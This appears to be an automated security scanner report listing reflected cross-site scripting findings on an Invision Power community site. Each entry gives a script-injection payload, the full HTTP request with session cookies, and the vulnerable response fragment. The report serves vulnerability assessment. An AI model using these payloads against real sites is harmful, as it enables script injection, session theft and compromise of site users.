The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... ipt type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da?_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'> ...[SNIP]...
3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1&_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'> ...[SNIP]...
3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'> ...[SNIP]...
3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1"; ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1"; ipb.sharelinks.title = "IP.Downloads file version in support topic title"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3937-peace/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1"; ipb.sharelinks.title = "Peace"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1"; ipb.sharelinks.title = "Turkish / T.rk.e Language Pack for (M31) Videos System 2.0.3 (public side)"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3939-vietnamese-3xx-lang/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3940-dp31-ihost/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1"; ipb.sharelinks.title = "(DP31) iHost"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3941-vanilla-valentine/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
